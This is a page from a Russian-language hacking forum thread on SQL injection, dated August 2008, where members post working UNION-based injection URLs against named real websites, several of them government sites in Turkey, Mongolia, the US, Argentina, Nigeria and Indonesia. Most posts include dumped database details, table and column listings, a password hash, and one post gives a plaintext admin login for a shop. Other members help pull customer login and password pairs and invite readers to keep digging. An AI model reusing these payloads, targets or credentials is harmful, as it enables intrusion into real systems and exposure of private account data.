HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 652 из 1604 « Первая < 152552602642 648 649 650 651 652 653 654 655 656 6627027521152 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6511  
Старый 29.08.2008, 16:39
paulzey
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216

Репутация: 59
Отправить сообщение для paulzey с помощью ICQ
По умолчанию
Код:
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),%20database()),10/*
olympicwatch_org_db@localhost:4.0.22:olympicwatch_org_db
+ раскрытие пути Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67

+ есть таблица users
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+user s/*
1
olympicwatch-admin

Точно названия поля с хэшем подобрать не получилось, пришлось выдирать через хитрую задницу
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
затем, хитрый join три раза, поскольку поля лежали в не выводимых областях
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+u sers+b/*

Хэш:f0b16007c9541482261c66376e8eaf03
Подобрать не удалось, точный алгоритм не установлен. С учётом того, что в users три поля, соли там (скорее всего) нет.
Ничего особо интересного найти не удалось.
 
Ответить с цитированием

  #6512  
Старый 29.08.2008, 18:10
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию
Код:
http://www.termal.gov.tr/portal/modules/articles/article.php?id=1%20UNION%20SELECT%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Цитата:
4.0.15:termalgovtr:termal-govtr@web1.turkticaret.net
 
Ответить с цитированием

  #6513  
Старый 29.08.2008, 18:53
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию
Вот несколько вкусных скулей от меня

Код:
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
iletisim (Id)
kullanici_log
kullanicilar(ID, kullanici, sifre)
kurul_uyeler
kurullar 
sayfa_icerik (KatID)
sayfalar (ID, sayfa_id, kullanici_id, sira, sayfa_adi, sayfa_adres, ust_id)
smf_members(ID_MEMBER, memberName, lngfile, passwd, ICQ, AIM, YIM, MSN  )
smf_moderators 
urun 

http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x696C65746973696D+limit+7,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID,0x3a,kullanici,0x3a,sifre),6,7,8,9,10,11,12,13+from+kullanicilar+limit+0,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID_MEMBER,0x3a,memberName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13+from+smf_members+limit+0,1/*
Код:
http://www.newportky.gov/inner_main.php?secid=-149+UNION+SELECT+concat(username,0x3a,password),2+from+users+limit+0,1/*
Код:
http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,concat(username,0x3a,password),3+from+login/*,password),2+from+users/*
http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,2,3+from+mysql.user/*
Код:
http://www.president.mn/show_module.php?index=speech&speechid=-214+UNION+SELECT+1,concat(userid,0x3a,username,0x3a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*
Код:
http://banten.go.id/?link=dtl&id=-2076+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Код:
http://www.lincoln.gov.ar/index.php?seccion_generica_id=-36+UNION+SELECT+1,column_name,3+from+information_schema.columns++where+table_name=0x5553554152494F53+limit+23,1/*
USUARIOS (USUARIO_ID, CLAVE, APELLIDO_NOMBRE, CIUDAD, ACCESO_ADMIN, PAIS...)

Код:
http://www.ondostate.gov.ng/news_details.php?id=-1741+UNION+SELECT+1,concat(id,0x3a,username,0x3a,password),3+from+admin+limit+0,1/*
 
Ответить с цитированием

  #6514  
Старый 29.08.2008, 20:52
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
http://www.zaistinu.ru/articles/?sid=-29+union+select+version()
version() - 5.0.32-Debian_7etch6-log
user() - zaistinu_0001@77.221.130.22
database() - zaistinu_0001

http://alterego.tut.by/library/showarticle.php?id=55+union+select+1,user(),versio n(),database(),5,6
version() - 4.0.27-log
user() - alteregotutby@gemini.tutby.com
database() - alteregotutby
 
Ответить с цитированием

  #6515  
Старый 30.08.2008, 07:17
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
Cайт: clas.ru
Код:
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_Ws(0x3a,database(),version(),user()),5,6,7,8--
User:u8122(sobaka)10.10.223.235
Version:5.0.45-log
Database:u8122_1gb_clas
Таблички:
Код:
bag
buyers
c_fields
c_order_fields
c_order_items
c_orders
colors
comments
companies
counter
countries
deliveries
delivery_fields
delivery_paids
distributors
fasons
genres
groups
ids
kath
links
media
messages
movies
news
news_items
opinions
orderpositions
orders
paids
people
pic
pic_any
presence
recences
screensizes
shirtmodels
shirts
shirtsgroup
sizes
staff
staff_types
subscribers
t_dostavka
t_news
t_oplata
t_rasskaz
t_users
texts
translations
users
vote_details
vote_items
vote_list
votes
wanted
book_wanted
Дальше не смог докопать,пошёл спать
 
Ответить с цитированием

  #6516  
Старый 30.08.2008, 08:16
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
Цитата:
Сообщение от Shadow_p1raT  
Дальше не смог докопать,пошёл спать
Мм... поможем

Просматриваем таблицу t_users лимитом
Код:
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x745f7573657273+limit+0,1--
Видим интересные поля: id, pass... Также адреса, телефоны, IP-адреса и т.д. Кароч хорошая БД.

Код:
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(id,0x3a,pass),5,6,7,8+from+t_users--
Эмм, логина не нашел. Идем в buyers.
Код:
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(login,0x3a,pass),5,6,7,8+from+buyers+limit+1,1--
И вот и пошли логины с пассами
Последний раз редактировалось USAkid; 30.08.2008 в 10:31..
 
Ответить с цитированием

  #6517  
Старый 30.08.2008, 23:14
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
http://www.terranita.ro/int/index.php?req=catalog&src=-10'+UNION+SELECT+1,2,table_name+from+information_s chema.tables+limit+1,1/*&zid=1

Database Version: 5.0.26
Database name: terranita_facelift
User name: terranita_user@localhost



http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(0x3a,version(),user(),database()),10/*

Database Version: 5.0.26
Database name: lobont1
User name: lobont@localhost
 
Ответить с цитированием

  #6518  
Старый 30.08.2008, 23:36
<Trash_man>
Новичок
Регистрация: 03.01.2008
Сообщений: 19
Провел на форуме:
391592

Репутация: 45
По умолчанию
китайский шоп
http://www.chinatown.com.au/shope/viewdetail.asp?id=1'%20or%201=(SELECT+@@version)--
админки шопа не нашол нашол только эту
http://www.chinatown.com.au/henry/admin/
henry:chinatown

кому интересно ковыряйте дальше
 
Ответить с цитированием

  #6519  
Старый 31.08.2008, 10:15
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
А смотрите...
вот таблица cpg_users с колонкой user_password
Цитата:
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,table_name,column_ name)+from+information_schema.columns+limit+296,1--
и user_name
Цитата:
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,table_name,column_ name)+from+information_schema.columns+limit+295,1--
почему не получается сделать запрос к этим колонкам?
Я пробовал
Цитата:
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,user_name,user_pas sword)+from+cpg_users--
 
Ответить с цитированием

  #6520  
Старый 31.08.2008, 10:35
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549

Репутация: 301
Отправить сообщение для N1K70 с помощью ICQ
По умолчанию
Цитата:
http://www.lolinko.com/index.php?command=claim&word=-666+union+select+concat_ws(user(),version(),databa se())+config_variables--
вот так вот =\
 
Ответить с цитированием
Ответ
Страница 652 из 1604 « Первая < 152552602642 648 649 650 651 652 653 654 655 656 6627027521152 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ